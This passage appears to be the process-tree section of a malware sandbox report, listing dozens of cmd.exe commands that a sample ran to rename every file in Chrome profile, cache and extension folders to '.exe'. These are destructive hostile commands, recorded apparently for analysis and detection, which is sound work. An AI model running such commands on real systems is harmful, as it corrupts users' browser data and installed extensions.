        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\*.*" "*.exe"
        6⤵
        
        PID:1300
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\*.*" "*.exe"
        6⤵
        
        PID:1660
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\*.*" "*.exe"
        6⤵
        
        PID:4868
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\*.*" "*.exe"
        6⤵
        
        PID:844
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\*.*" "*.exe"
        6⤵
        
        PID:976
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\*.*" "*.exe"
        6⤵
        
        PID:2624
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\*.*" "*.exe"
        6⤵
        
        PID:1652
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\*.*" "*.exe"
        6⤵
        
        PID:2760
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\*.*" "*.exe"
        6⤵
        
        PID:2732
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_metadata\*.*" "*.exe"
        6⤵
        
        PID:384
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\af\*.*" "*.exe"
        6⤵
        
        PID:1452
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\am\*.*" "*.exe"
        6⤵
        
        PID:1448
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\ar\*.*" "*.exe"
        6⤵
        
        PID:1528
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\az\*.*" "*.exe"
        6⤵
        
        PID:3128
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\be\*.*" "*.exe"
        6⤵
        
        PID:5032
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\bg\*.*" "*.exe"
        6⤵
        
        PID:2832
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\bn\*.*" "*.exe"
        6⤵
        
        PID:3476
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\ca\*.*" "*.exe"
        6⤵
        
        PID:1252
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\cs\*.*" "*.exe"
        6⤵
        
        PID:1796
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\cy\*.*" "*.exe"
        6⤵
        
        PID:1652
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\da\*.*" "*.exe"
        6⤵
        
        PID:752
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\de\*.*" "*.exe"
        6⤵
        
        PID:1852
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\el\*.*" "*.exe"
        6⤵
        
        PID:3500
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\en\*.*" "*.exe"
        6⤵
        
        PID:1900
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\en_CA\*.*" "*.exe"
        6⤵
        
        PID:2860
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\en_GB\*.*" "*.exe"
        6⤵
        
        PID:4464
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\en_US\*.*" "*.exe"
        6⤵
        
        PID:4740
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\es\*.*" "*.exe"
        6⤵
        
        PID:4704
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\es_419\*.*" "*.exe"
        6⤵
        
        PID:1516
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\et\*.*" "*.exe"
        6⤵
        
        PID:4860
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\eu\*.*" "*.exe"
        6⤵
        
        PID:224
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\fa\*.*" "*.exe"
        6⤵
        
        PID:2804
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\fi\*.*" "*.exe"
        6⤵
        
        PID:3236
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\fil\*.*" "*.exe"
        6⤵
        
        PID:1488
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\fr\*.*" "*.exe"
        6⤵
        
        PID:3980
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\fr_CA\*.*" "*.exe"
        6⤵
        
        PID:4392
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\gl\*.*" "*.exe"
        6⤵
        
        PID:3500
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\gu\*.*" "*.exe"
        6⤵
        
        PID:1900
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\hi\*.*" "*.exe"
        6⤵
        
        PID:1076
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\hr\*.*" "*.exe"
        6⤵
        
        PID:3128
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\hu\*.*" "*.exe"
        6⤵
        
        PID:2740
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\hy\*.*" "*.exe"
        6⤵
        
        PID:2864
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\id\*.*" "*.exe"
        6⤵
        
        PID:3476
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\is\*.*" "*.exe"
        6⤵
        
        PID:1428
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\it\*.*" "*.exe"
        6⤵
        
        PID:764
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\iw\*.*" "*.exe"
        6⤵
        
        PID:1252
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\ja\*.*" "*.exe"
        6⤵
        
        PID:3236
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\ka\*.*" "*.exe"
        6⤵
        
        PID:1488
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\kk\*.*" "*.exe"
        6⤵
        
        PID:2428
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\km\*.*" "*.exe"
        6⤵
        
        PID:1908
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\kn\*.*" "*.exe"
        6⤵
        
        PID:3676
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\ko\*.*" "*.exe"
        6⤵
        
        PID:2860
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\lo\*.*" "*.exe"
        6⤵
        
        PID:2896
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\lt\*.*" "*.exe"
        6⤵
        
        PID:3728
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\lv\*.*" "*.exe"
        6⤵
        
        PID:3836
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\ml\*.*" "*.exe"
        6⤵
        
        PID:2468
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\mn\*.*" "*.exe"
        6⤵
        
        PID:4252
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\mr\*.*" "*.exe"
        6⤵
        
        PID:1796
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\ms\*.*" "*.exe"
        6⤵
        
        PID:1852
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\my\*.*" "*.exe"
        6⤵
        
        PID:3764
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\ne\*.*" "*.exe"
        6⤵
        
        PID:4572
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\nl\*.*" "*.exe"
        6⤵
        
        PID:1092
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\no\*.*" "*.exe"
        6⤵
        
        PID:3452
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\pa\*.*" "*.exe"
        6⤵
        
        PID:5088
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1908
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\pl\*.*" "*.exe"
        6⤵
        
        PID:1576
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\pt_BR\*.*" "*.exe"
        6⤵
        
        PID:4716
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\pt_PT\*.*" "*.exe"
        6⤵
        
        PID:780
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\ro\*.*" "*.exe"
        6⤵
        
        PID:3728
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\ru\*.*" "*.exe"
        6⤵
        
        PID:3296
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\si\*.*" "*.exe"
        6⤵
        
        PID:1408
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\sk\*.*" "*.exe"
        6⤵
        
        PID:4252
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\sl\*.*" "*.exe"
        6⤵
        
        PID:2732
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\sr\*.*" "*.exe"
        6⤵
        
        PID:5020
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\sv\*.*" "*.exe"
        6⤵
        
        PID:2300
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\sw\*.*" "*.exe"
        6⤵
        
        PID:3764
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\ta\*.*" "*.exe"
        6⤵
        
        PID:2128
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\te\*.*" "*.exe"
        6⤵
        
        PID:4464
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\th\*.*" "*.exe"
        6⤵
        
        PID:5088
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\tr\*.*" "*.exe"
        6⤵
        
        PID:976
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\uk\*.*" "*.exe"
        6⤵
        
        PID:3128
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\ur\*.*" "*.exe"
        6⤵
        
        PID:1152
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\vi\*.*" "*.exe"
        6⤵
        
        PID:1516
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\zh_CN\*.*" "*.exe"
        6⤵
        
        PID:3296
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\zh_HK\*.*" "*.exe"
        6⤵
        
        PID:2916
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\zh_TW\*.*" "*.exe"
        6⤵
        
        PID:2288
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\zu\*.*" "*.exe"
        6⤵
        
        PID:4752
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\*.*" "*.exe"
        6⤵
        
        PID:4572
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\*.*" "*.exe"
        6⤵
        
        PID:2300
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\*.*" "*.exe"
        6⤵
        
        PID:4720
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\*.*" "*.exe"
        6⤵
        
        PID:5032
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\*.*" "*.exe"
        6⤵
        
        PID:1300
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\*.*" "*.exe"
        6⤵
        
        PID:3680
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\*.*" "*.exe"
        6⤵
        
        PID:4964
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca\*.*" "*.exe"
        6⤵
        
        PID:3836
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs\*.*" "*.exe"
        6⤵
        
        PID:564
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da\*.*" "*.exe"
        6⤵
        
        PID:4868
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\de\*.*" "*.exe"
        6⤵
        
        PID:4800
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\el\*.*" "*.exe"
        6⤵
        
        PID:1652
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en\*.*" "*.exe"
        6⤵
        
        PID:5020
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB\*.*" "*.exe"
        6⤵
        
        PID:2808
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es\*.*" "*.exe"
        6⤵
